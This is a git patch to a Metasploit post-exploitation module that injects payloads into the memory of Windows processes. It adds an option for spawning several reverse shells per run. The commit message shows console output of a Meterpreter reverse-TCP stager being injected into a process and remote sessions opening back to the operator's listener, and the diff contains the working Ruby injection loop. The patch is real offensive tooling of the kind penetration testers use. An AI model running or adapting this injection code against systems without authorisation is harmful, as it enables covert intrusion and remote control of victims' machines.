From d208ab92609d0f54283d30f77699741626a4f7f5 Mon Sep 17 00:00:00 2001 From: trustedsec Date: Wed, 9 Oct 2013 22:01:11 -0400 Subject: [PATCH] Added multiple payload capabilities Added support to specify multiple payload delivery options. msf post(payload_inject) > show options Module options (post/windows/manage/payload_inject): Name Current Setting Required Description ---- --------------- -------- ----------- AMOUNT 2 no Select the amount of shells you want to spawn. HANDLER false no Start an Exploit Multi Handler to receive the connection LHOST XXXXXXXX yes IP of host that will receive the connection from the payload. LPORT 4433 no Port for Payload to connect to. OPTIONS # no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format. PAYLOAD windows/meterpreter/reverse_tcp no Windows Payload to inject into memory of a process. PID no Process Identifier to inject of process to inject payload. SESSION 1 yes The session to run this module on. msf post(payload_inject) > set HANDLER true HANDLER => true msf post(payload_inject) > exploit [*] Running module against XXXXXXXX [*] Starting exploit multi handler [*] Performing Architecture Check [*] Started reverse handler on XXXXXXXX:4433 [*] Starting the payload handler... [*] Process found checking Architecture [+] Process is the same architecture as the payload [*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884 [*] Opening process 884 [*] Generating payload [*] Allocating memory in procees 884 [*] Allocated memory at address 0x003b0000, for 290 byte stager [*] Writing the stager into memory... [*] Sending stage (770048 bytes) to XXXXXXXX [+] Successfully injected payload in to process: 884 [*] Performing Architecture Check [*] Process found checking Architecture [+] Process is the same architecture as the payload [*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884 [*] Opening process 884 [*] Generating payload [*] Allocating memory in procees 884 [*] Allocated memory at address 0x00ba0000, for 290 byte stager [*] Writing the stager into memory... [+] Successfully injected payload in to process: 884 [*] Post module execution completed msf post(payload_inject) > [*] Meterpreter session 2 opened (XXXXXXXX:4433 -> XXXXXXXX:2962) at 2013-10-09 21:54:25 -0400 [*] Sending stage (770048 bytes) to XXXXXXXX msf post(payload_inject) > [*] Meterpreter session 3 opened (XXXXXXXX:4433 -> XXXXXXXX:2963) at 2013-10-09 21:54:27 -0400 --- modules/post/windows/manage/payload_inject.rb | 39 +++++++++++-------- 1 file changed, 22 insertions(+), 17 deletions(-) diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index 8985a7465c..31b3529ae8 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -7,9 +7,12 @@ require 'msf/core' require 'rex' +require 'msf/core/post/common' class Metasploit3 < Msf::Post + include Msf::Post::Common + def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Memory Payload Injection Module', @@ -19,32 +22,28 @@ class Metasploit3 < Msf::Post using a reverse x86 TCP Meterpreter Payload. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Carlos Perez '], + 'Author' => [ 'Carlos Perez ', + 'David Kennedy "ReL1K" ' # added multiple payload support + ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) register_options( [ - OptString.new('PAYLOAD', - [false, 'Windows Payload to inject into memory of a process.', - "windows/meterpreter/reverse_tcp"]), - OptAddress.new('LHOST', - [true, 'IP of host that will receive the connection from the payload.']), - OptInt.new('LPORT', - [false, 'Port for Payload to connect to.', 4433]), - OptInt.new('PID', - [false, 'Process Identifier to inject of process to inject payload.']), - OptBool.new('HANDLER', - [ false, 'Start an Exploit Multi Handler to receive the connection', false]), - OptString.new('OPTIONS', - [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format.", - ""]) - ], self.class) + OptString.new('PAYLOAD', [false, 'Windows Payload to inject into memory of a process.', "windows/meterpreter/reverse_tcp"]), + OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']), + OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]), + OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']), + OptBool.new('HANDLER', [ false, 'Start an Exploit Multi Handler to receive the connection', false]), + OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."]), + OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1]) + ], self.class) end # Run Method for when run command is issued def run + # syinfo is only on meterpreter sessions print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? @@ -62,6 +61,7 @@ class Metasploit3 < Msf::Post opts = datastore['OPTIONS'] # Create payload payload = create_payload(pay_name,lhost,lport,opts) + if pid == 0 or not has_pid?(pid) pid = create_temp_proc(payload) end @@ -71,7 +71,12 @@ class Metasploit3 < Msf::Post return false else create_multihand(payload,pay_name,lhost,lport) if datastore['HANDLER'] - inject_into_pid(payload,pid,datastore['NEWPROCESS']) + + datastore['AMOUNT'].times do # iterate through number of shells + + inject_into_pid(payload,pid,datastore['NEWPROCESS']) + + end end end